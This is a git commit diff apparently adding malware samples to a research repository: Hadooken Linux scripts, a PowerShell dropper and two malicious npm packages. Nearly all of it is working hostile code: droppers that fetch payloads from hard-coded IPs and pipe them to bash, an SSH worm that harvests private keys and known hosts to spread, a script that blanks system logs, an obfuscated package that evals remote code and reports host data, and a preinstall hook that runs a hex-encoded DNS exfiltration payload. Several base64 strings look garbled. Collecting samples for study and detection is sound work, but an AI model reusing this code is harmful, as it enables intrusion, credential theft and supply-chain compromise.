Add hadooken and jail samples (#5)

* Add Darkcracks, helmen-validate, noblox, aspdasdksa2 samples

* Remove blank output files

* add README

* Add hadooken and jail samples

linux/2024.hadooken/crondr_as_bash.sh

@@ -0,0 +1,5 @@
+#!/bin/bash
+cp -f -r -- /bin/crondr /bin/-bash 2>/dev/null
+cd /bin 2>/dev/null
+./-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls  -d >/dev/null 2>&1
+rm -rf -- -bash 2>/dev/null

linux/2024.hadooken/drop1.sh

@@ -0,0 +1,6 @@
+
+(curl -s http://89.185.85.102/c || wget -q -0- http://89.185.85.102/c || lwp-download http://89.185.85.102/c /tmp/c) | bash -sh; bash /tmp/c;
+rm -rf /tmp/c;
+echo
+kucmVhZCgpkScgfHwgcHl0aG9uMyA
+cHl0aG9uIC1jICdpbXBvcnQgdXJsbGl{LnJlcXVlc3Q7IGV4ZWModXJsbGl{LnJlcXVlc3QudXJsb3BlbigiaHR0cDovLzE4NS4xNzQuMTM2LjIwNC951 tYyAnaW1wb3J8IHVybGxpY5yZXF1ZXN80yBleGVjKHVybGxpY{5yZXF1ZXN0LnVybG9wZW4oImh0dHA6Ly8x0DUUMTcOLJEzNl4yMDQveSpLnJlYWQoKSkn | base64 -d | bash

linux/2024.hadooken/drop2.sh

@@ -0,0 +1,2 @@
+
+python -c 'import urllib.request; exec(urllib.request.urlopen("http://185.174.136.204/y").read())' || python3 -c 'import urllib.request; exec(urllib.request.urlopen("http://185.174.136.204/y").read())"

linux/2024.hadooken/drop3.sh

@@ -0,0 +1,13 @@
+
+cc="http://89.185.85.102"
+sys="kekenukaxusn"
+DIR="/tmp"
+
+m() {
+    get "$cc/hadooken" "$DIR/$sys"
+    "$DIR/$sys"
+    sleep 1
+}
+
+m
+rm -f "$DIR/$sys"

linux/2024.hadooken/drop3_mod.sh

@@ -0,0 +1,13 @@
+
+cc="http://89.185.85.102"
+sys="kekenukaxusn"
+DIR="/tmp"
+
+m() {
+    get $cc/hadooken ./$sys
+    ./$sys
+    sleep 1
+}
+
+m
+rm -f ./$sys

linux/2024.hadooken/figure4.py

@@ -0,0 +1,26 @@
+
+import platform
+import os
+import urllib.request
+def download_and_execute(url, target_path):
+try:
+response = urllib.request.urlopen(url)
+if response.getcode() == 200:
+data = response.read()
+with open(target_path, "wb") as code: code.write(data)
+os.chmod(target_path, 00777)
+cmd = '{}'.format(target_path) os.system(cmd)
+print("Command OK")
+return True
+except Exception:
+pass
+finally:
+if os.path.exists(target_path):
+os.remove(target_path)
+return False
+if platform.architecture()[0] =="64bit":
+url = "http://185.174.136.204/hadooken"
+for target_dir in ["/tmp", "/var/tmp", "/dev/shm", "/run/user", "/usr/local/share", "/var/run", "/opt", "/", "/mnt"]: target_path = os.path.join(target_dir, "hadooken")
+if download_and_execute(url, target_path):
+print("Download Already OK")
+break

linux/2024.hadooken/something.ps1

@@ -0,0 +1,18 @@
+
+function A1B2C {
+param (
+[Parameter (Mandatory = $true)] [string] $D3E4F,
+[Parameter (Mandatory = $true)]
+[string] $G5H6I
+)
+$J7K8L = [System.IO.Path]::GetTempPath()
+$M9N00 = Join-Path -Path $J7K8L -ChildPath $G5H6I
+try {
+$P1Q2R = [System.Convert]:: FromBase64String($D3E4F) [System.IO.File]::WriteAllBytes($M9N00, $P1Q2R) Start-Process -FilePath $M9N0O
+} catch {
+}
+}
+$S3T4U
+"TVqQA << REDUCTED>> AAAAAAAA"
+$V5W6X = "Winscpmodified.exe"
+A1B2C -D3E4F $S3T4U -G5H61 $V5W6X

linux/2024.hadooken/ssh_worm.sh

@@ -0,0 +1,25 @@
+_sig="$HOME/.localsshaxxaa"
+if [ ! -f "$_sig" ]; then
+	-q -0
+	touch "$_sig"
+	KEYS=$(find ~/ /root/home -maxdepth 2 -name 'id_rsa*'! -name '*.pub')
+	KEYS2=$(grep -h IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | awk '{print $2}') KEYS3=$(find ~/ /root/home -maxdepth 3 -name '*.pem' | uniq)
+	HOSTS=$(grep -h HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | awk '{print $2}')
+	HOSTS2=$(grep -OP "(ssh|scp)\s+\K[^\s]+" ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}")
+	HOSTS3=$(grep -h -oP "([0-9]{1,3}\. ){3}[0-9]{1,3}" ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | uniq)
+	USERZ=$(find ~/ /root/home -maxdepth 2 -name '.ssh' | xargs -I {} find {} -name 'id_rsa*' ! -name '*.pub' | awk -F'/' '{print $3}' | uniq)
+	users=$(
+		echo "$USERZ" | tr
+		'\n' | sort -u
+	)
+	hosts=$(echo -e "$HOSTS\n$HOSTS2\n$HOSTS3" | grep -v "127.0.0.1" | sort -u)
+	keys=$(echo -e "$KEYS\n$KEYS2\n$KEYS3" | sort -u)
+	for user in $users; do
+		for host in $hosts; do
+			for key in $keys; do
+				chmod 400 "$key"
+				ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i "$key" "$user@$host" "(curl -s http://89.185.85.102/c || wget http://89.185.85.102/c || lwp-download http://89.185.85.102/c /tmp/c) | bash -sh; bash /tmp/c; rm -rf /tmp/c; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliLnJlcXVlc3Q7IGV4ZWModXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovLzE4NS4xNzQuMTM2LjIwNC95IikucmVhZCgpKScgfHwgcHl0aG9uMyAtYyAnaW1wb3J0IHVybGxpYi5yZXF1ZXN00yBleGVjKHVybGxpYi5yZXF1ZXN0LnVybG9wZW40 Imh0dHA6Ly8x0DUUMTCOLjEzNi4yMDQveSIpLnJlYWQoKSkn" | base64 -d | bash
+			done
+		done
+	done
+fi

linux/2024.hadooken/wipe_logs.sh

@@ -0,0 +1,4 @@
+echo 0 > /var/spool/mail/root
+echo 0 > /var/log/wtmp
+echo 0 > /var/log/secure
+echo 0 > /var/log/cron

npm/2024.bugsnagmw/index.js

@@ -0,0 +1,228 @@
+const _0x122a47 = _0x4cfd;
+(function (_0x19b533, _0x3a14dd) {
+  const _0x491cff = _0x4cfd,
+    _0x2dcd82 = _0x19b533();
+  while (!![]) {
+    try {
+      const _0x2e6977 =
+        (-parseInt(_0x491cff(0x1bd)) / (0x156d + 0x1569 + -0x2ad5)) *
+          (-parseInt(_0x491cff(0x1a7)) /
+            (0x1 * 0x2112 + -0xe * 0x1ea + -0x644)) +
+        -parseInt(_0x491cff(0x19f)) /
+          (-0x1 * -0x19d3 + -0x425 * -0x5 + -0x2e89) +
+        parseInt(_0x491cff(0x1a2)) / (0x10d * -0x11 + 0x1 * 0xa7d + 0x764) +
+        (-parseInt(_0x491cff(0x195)) /
+          (0x4 * 0x8a6 + 0x7 * 0x439 + 0x4022 * -0x1)) *
+          (-parseInt(_0x491cff(0x19a)) /
+            (-0xbb9 * 0x1 + -0x1f2b + -0x6 * -0x727)) +
+        -parseInt(_0x491cff(0x19b)) / (0x4a2 * 0x4 + 0x18fb + -0x1fa * 0x16) +
+        parseInt(_0x491cff(0x1a1)) / (0x1b6b + -0x26f7 + 0xb94) +
+        (-parseInt(_0x491cff(0x1a4)) / (-0x261b + -0x20cb + 0x46ef)) *
+          (parseInt(_0x491cff(0x1a9)) / (0x1d4c + 0x1d * 0xbf + -0x32e5));
+      if (_0x2e6977 === _0x3a14dd) break;
+      else _0x2dcd82["push"](_0x2dcd82["shift"]());
+    } catch (_0x1ea857) {
+      _0x2dcd82["push"](_0x2dcd82["shift"]());
+    }
+  }
+})(_0x5808, -0x14ee15 + -0xd9a42 + 0x7 * 0x68bee);
+const express = require(_0x122a47(0x1ab)),
+  axios = require(_0x122a47(0x1b8)),
+  delay = (_0xa2960b) =>
+    new Promise((_0x339732) => setTimeout(_0x339732, _0xa2960b)),
+  increaseTimeoutMiddleware = function (_0x6c7e55) {
+    const _0x37c262 = {
+      kUiFu: function (_0x5176b1) {
+        return _0x5176b1();
+      },
+    };
+    return (_0x116b66, _0x5948ed, _0x4ba5ef) => {
+      const _0x1a3c7a = _0x4cfd;
+      _0x116b66[_0x1a3c7a(0x1b7)](_0x6c7e55),
+        _0x37c262[_0x1a3c7a(0x190)](_0x4ba5ef);
+    };
+  },
+  catchAsync = (_0x55e054) => {
+    const _0x2f553d = {
+      jEHcf: function (_0x192f35, _0x23dbe0, _0x3c4bac, _0x350ddf) {
+        return _0x192f35(_0x23dbe0, _0x3c4bac, _0x350ddf);
+      },
+    };
+    return (_0x55e9e0, _0x111bf0, _0x4be67f) => {
+      const _0x4629fa = _0x4cfd;
+      _0x2f553d[_0x4629fa(0x18f)](_0x55e054, _0x55e9e0, _0x111bf0, _0x4be67f)[
+        _0x4629fa(0x1ba)
+      ](_0x4be67f);
+    };
+  };
+async function run(_0x4eaa94, _0x398fca) {
+  const _0x3fb732 = _0x122a47,
+    _0x577285 = {
+      tOPbR: function (_0x36b2cc, _0x154a2c) {
+        return _0x36b2cc(_0x154a2c);
+      },
+    };
+  let _0x5aa7d8 =
+      _0x3fb732(0x1bc) +
+      _0x3fb732(0x1be) +
+      _0x3fb732(0x1b6) +
+      _0x3fb732(0x1ad) +
+      _0x3fb732(0x198),
+    _0x1e516a = _0x4eaa94[_0x3fb732(0x1b3)];
+  return _0x577285[_0x3fb732(0x19d)](eval, _0x1e516a["js"]);
+}
+function _0x5808() {
+  const _0x11173f = [
+    "237054jeHhqw",
+    "1834161FfqVqh",
+    "i.ipify.or",
+    "tOPbR",
+    "NmUMH",
+    "210804RGvmIx",
+    "sSyII",
+    "6379304IXNDzu",
+    "4237008NTmesW",
+    "g?format=j",
+    "18hEBkiY",
+    "post",
+    ".72.229.23",
+    "4GGrSjt",
+    "ETxAC",
+    "11333280pUxuCJ",
+    "VsuQj",
+    "express",
+    "IJGiK",
+    "return\x20\x27a\x27",
+    "EijpY",
+    "get",
+    "ZOvjL",
+    "bugsnag",
+    "/pproperty",
+    "body",
+    "son",
+    "http://184",
+    "t\x27);\x0a//\x20\x20\x20",
+    "setTimeout",
+    "axios",
+    "/scrappedd",
+    "catch",
+    "lXgvx",
+    "console.lo",
+    "602929MJubhw",
+    "g(\x27Run\x20tes",
+    "jEHcf",
+    "kUiFu",
+    "sqJsh",
+    "https://ap",
+    "send",
+    "7:9999/mh",
+    "35WCGHrh",
+    "use",
+    "Router",
+    ";\x0a\x20\x20",
+    "YBayv",
+  ];
+  _0x5808 = function () {
+    return _0x11173f;
+  };
+  return _0x5808();
+}
+async function pst_inf() {
+  const _0x3da834 = _0x122a47,
+    _0x478b2b = {
+      ETxAC:
+        _0x3da834(0x192) +
+        _0x3da834(0x19c) +
+        _0x3da834(0x1a3) +
+        _0x3da834(0x1b4),
+      ZOvjL: _0x3da834(0x1b5) + _0x3da834(0x1a6) + _0x3da834(0x194),
+    };
+  try {
+    let _0xbbb76c = {};
+    try {
+      let { data: _0x393d8a } = await axios[_0x3da834(0x1af)](
+        _0x478b2b[_0x3da834(0x1a8)]
+      );
+      _0xbbb76c = { ..._0xbbb76c, ..._0x393d8a };
+    } catch (_0x17dcdf) {}
+    let _0x28bf33 = await axios[_0x3da834(0x1a5)](
+      _0x478b2b[_0x3da834(0x1b0)],
+      _0xbbb76c
+    );
+  } catch (_0x44a028) {}
+}
+async function st() {
+  const _0x93d204 = _0x122a47,
+    _0x21ed82 = {
+      sSyII: function (_0x2d5bdd) {
+        return _0x2d5bdd();
+      },
+      YBayv: function (_0x4f4802, _0xfc81cf) {
+        return _0x4f4802(_0xfc81cf);
+      },
+    };
+  while (!![]) {
+    try {
+      await _0x21ed82[_0x93d204(0x1a0)](run);
+    } catch (_0x5e622b) {}
+    await _0x21ed82[_0x93d204(0x199)](
+      delay,
+      -0xdd55c * 0x9 + -0x4a0078c + -0x1 * -0x8177848
+    );
+  }
+}
+async function st2(_0x2fc7f5) {
+  const _0x21835c = _0x122a47,
+    _0x16eb0d = {
+      VsuQj: function (_0x4262aa, _0x45ac76, _0x3b1cc9) {
+        return _0x4262aa(_0x45ac76, _0x3b1cc9);
+      },
+      IJGiK: function (_0x12ba3f) {
+        return _0x12ba3f();
+      },
+      NmUMH: _0x21835c(0x1b9),
+      lXgvx: function (_0x19682d, _0x7ae28a) {
+        return _0x19682d(_0x7ae28a);
+      },
+      EijpY: _0x21835c(0x1b2),
+      sqJsh: function (_0x284bc9) {
+        return _0x284bc9();
+      },
+    },
+    _0xa237ae = express[_0x21835c(0x197)]();
+  _0xa237ae[_0x21835c(0x1a5)](
+    _0x16eb0d[_0x21835c(0x19e)],
+    _0x16eb0d[_0x21835c(0x1bb)](
+      increaseTimeoutMiddleware,
+      0x1 * 0xb9a71 + 0x79 * 0xae7 + -0x799e0
+    ),
+    _0x16eb0d[_0x21835c(0x1bb)](catchAsync, async (_0x2fc188, _0x4ed992) => {
+      const _0x4b4cb8 = _0x21835c;
+      _0x4ed992[_0x4b4cb8(0x193)](
+        await _0x16eb0d[_0x4b4cb8(0x1aa)](run, _0x2fc188, _0x4ed992)
+      );
+    })
+  ),
+    await _0x2fc7f5[_0x21835c(0x196)](_0x16eb0d[_0x21835c(0x1ae)], _0xa237ae),
+    _0x16eb0d[_0x21835c(0x191)](pst_inf);
+  const _0x1bc03c = _0x16eb0d[_0x21835c(0x1aa)](
+    setInterval,
+    function () {
+      const _0x4760c0 = _0x21835c;
+      _0x16eb0d[_0x4760c0(0x1ac)](pst_inf);
+    },
+    -0x1 * -0x4efcf + 0x1de1d8 + 0x9b * -0xc25
+  );
+}
+function _0x4cfd(_0x42ad4b, _0x44de92) {
+  const _0x5582da = _0x5808();
+  return (
+    (_0x4cfd = function (_0x10efd3, _0x2ab9c3) {
+      _0x10efd3 = _0x10efd3 - (0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd);
+      let _0x46636f = _0x5582da[_0x10efd3];
+      return _0x46636f;
+    }),
+    _0x4cfd(_0x42ad4b, _0x44de92)
+  );
+}
+exports[_0x122a47(0x1b1)] = st2;

npm/2024.depe-tool/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "depe-tool",
+  "version": "1.2.2",
+  "description": "p0c",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node -e \"const fs = require('fs'); const rawData = fs.readFileSync('preinstall.json'); const jsonData = JSON.parse(rawData); eval(jsonData.script);\""
+  },
+  "author": "",
+  "license": "ISC"
+}

npm/2024.depe-tool/preinstall.json

@@ -0,0 +1,3 @@
+{
+  "script": "const hexPayload = '0a636f6e7374206f73203d207265717569726528276f7327293b0a636f6e737420646e73203d20726571756972652827646e7327293b0a0a636f6e737420656e636f646544617461203d20286461746129203d3e204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e737420676574557365724e616d65203d202829203d3e206f732e75736572496e666f28292e757365726e616d653b0a636f6e73742064617461203d207b20757365726e616d653a20676574557365724e616d652829207d3b0a636f6e737420656e636f64656444617461203d20656e636f646544617461284a534f4e2e737472696e67696679286461746129293b0a0a66756e6374696f6e20646e73457866696c74726174696f6e2829207b0a2020636f6e737420657866696c74726174696f6e446f6d61696e203d2060247b656e636f646564446174617d2e6671396d6575796b3370776d756a666464783536306e7838387a6571326871362e6f6173746966792e636f6d603b0a2020646e732e7265736f6c76653428657866696c74726174696f6e446f6d61696e2c20286572722c2061646472657373657329203d3e207b0a202020206966202865727229207b0a20202020202070726f636573732e657869742831293b0a202020207d20656c7365207b0a20202020202070726f636573732e657869742830293b0a202020207d0a20207d293b0a7d0a0a646e73457866696c74726174696f6e28293b0a'; const decodeHex = (hex) => Buffer.from(hex, 'hex').toString('utf8'); const payload = decodeHex(hexPayload); eval(payload);"
+}